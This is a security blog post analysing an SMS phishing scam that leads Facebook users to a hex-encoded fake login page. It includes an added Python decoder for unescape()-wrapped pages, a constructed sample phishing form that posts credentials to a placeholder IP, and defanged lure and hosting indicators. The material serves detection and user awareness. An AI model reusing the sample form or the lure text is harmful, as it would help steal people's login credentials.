Update, 01 Sept 2014: NUMBERCOP, one of our blog readers, has tipped us off in the comments section that this particular scam has resurfaced once again with a new bit.ly URL, created on August 31, 2014, a couple of days ago. The number of visitors to that link, as of this writing, appears to be increasing.
Original post:
If you happen to receive an SMS message from an unknown sender with the following text—
wtf f***** remove this pic from Facebook. http://bit[dot]do/fbnudephotos
—much like the fellow in the screenshot above, then you’ve been targeted by a phishing campaign.
The bit.do link is the shortened URL for a publicly available HTML page hosted on a Dropbox account. It looks like this:
All links but one, the "Get Facebook for iPhone and browse faster." link, lead to a 404 page. That one link leads to the actual iTunes app download page.
The full code of the page is actually hex encoded and executed by the unescape() function. Part of the code looks like this once decoded with a free online tool:
Once users provide their Facebook credentials to the page, these are posted to a .PHP page hosted on 193[dot]107[dot]17[dot]68, which we have found to be quite a popular location for hosting malware.
While this happens in the background, users are redirected to the page shown in the following screenshot, which serves as humour, if not a “Gotcha!”, after a successful con.
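The two steps above, decoding the unescape()-wrapped page and finding where the form posts the credentials, are what an analyst does with that "free online tool". The script below is an added example written for this post, not code from the original article or from Malwarebytes. It assumes the page is delivered as `document.write(unescape("..."))`, which the post does not state explicitly; the sample script, the 198.51.100.23 address and the example.invalid hosting URL are constructed placeholders, not the real indicators from the campaign.

```python
import re
from urllib.parse import urljoin, urlparse

# Characters that JavaScript's escape() leaves untouched; everything else is %XX or %uXXXX.
_SAFE = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@*_+-./")
_ESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_UNESCAPE_CALL_RE = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)
_ACTION_RE = re.compile(r"""action\s*=\s*["']([^"']+)["']""", re.I)


def js_escape(text: str) -> str:
    """Mirror JavaScript escape(): %XX for code points below 256, %uXXXX above.
    Code points above U+FFFF (JS surrogate pairs) are out of scope here."""
    out = []
    for ch in text:
        cp = ord(ch)
        if ch in _SAFE:
            out.append(ch)
        elif cp < 256:
            out.append(f"%{cp:02X}")
        else:
            out.append(f"%u{cp:04X}")
    return "".join(out)


def js_unescape(text: str) -> str:
    """Mirror JavaScript unescape(); malformed sequences such as %G1 are left as-is."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return _ESC_RE.sub(repl, text)


def extract_unescape_payloads(script: str) -> list:
    """Decode the string argument of every unescape("...") call found in a script."""
    return [js_unescape(m.group(2)) for m in _UNESCAPE_CALL_RE.finditer(script)]


def form_targets(html: str) -> list:
    """Every form action attribute in the decoded HTML."""
    return _ACTION_RE.findall(html)


def untrusted_form_targets(html: str, trusted_hosts: set, page_url: str) -> list:
    """Form actions whose host is not one of the brand's own hosts: that is where
    submitted credentials would actually go. Relative actions are resolved against
    the hosting page, so a form posting back to the hosting site is flagged too."""
    hits = []
    for action in form_targets(html):
        resolved = urljoin(page_url, action)
        host = (urlparse(resolved).hostname or "").lower()
        if host not in trusted_hosts:
            hits.append(action)
    return hits


# Constructed sample of the wrapper the phishing page uses (placeholder IP, not the real one).
SAMPLE_SCRIPT = (
    "document.write(unescape(\""
    "%3Cform%20method%3D%22post%22%20action%3D%22http%3A//198.51.100.23/collect.php%22%3E"
    "%3Cinput%20name%3D%22email%22%3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E"
    "%3C/form%3E%3Ca%20href%3D%22https%3A//www.facebook.com/login%22%3ELog%20in%3C/a%3E"
    "\"));"
)
TRUSTED_HOSTS = {"facebook.com", "www.facebook.com"}
PAGE_URL = "https://example.invalid/u/0/index.html"  # constructed hosting location


def analyze_script(script: str = SAMPLE_SCRIPT, trusted_hosts: set = TRUSTED_HOSTS,
                   page_url: str = PAGE_URL) -> list:
    """Decode every unescape() payload and return the credential collection endpoints."""
    hits = []
    for html in extract_unescape_payloads(script):
        hits.extend(untrusted_form_targets(html, trusted_hosts, page_url))
    return hits


if __name__ == "__main__":
    for html in extract_unescape_payloads(SAMPLE_SCRIPT):
        print("decoded page:", html)
    print("credentials are posted to:", analyze_script())
```

The decoder deliberately leaves malformed sequences untouched, as the browser's unescape() does, so the output matches what a victim's browser would render rather than what a stricter percent-decoder would produce.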
Another thing of note is the bit.ly URL at the bottom of the code:
This is a shortened URL for what we believe is a page that was once a diet scam page, judging from the actual URL string we have encountered before:
We suspect that this bit.ly URL is included to increase the click-through rate or visits to the page.
Individuals or groups with bad intent have been using SMS as a way to scam people, either for their money or for their information.
Senior Security Researcher Jérôme Segura published a post entitled “SMS Scams: How To Defend Yourself” back in 2013, which I recommend you read as well, dear Reader. His thoughts on this kind of fraud remain relevant to this date.
Other related posts:
- Uncovering an Android botnet involved in SMS fraud
- Mobile Top-Up Credit Sharing Scams in Circulation
- SMS Activated Flash Downloads: A Digital Leap of Faith
- Porn on YouTube Leads to Premium-Rate SMS Scams
Jovi Umawing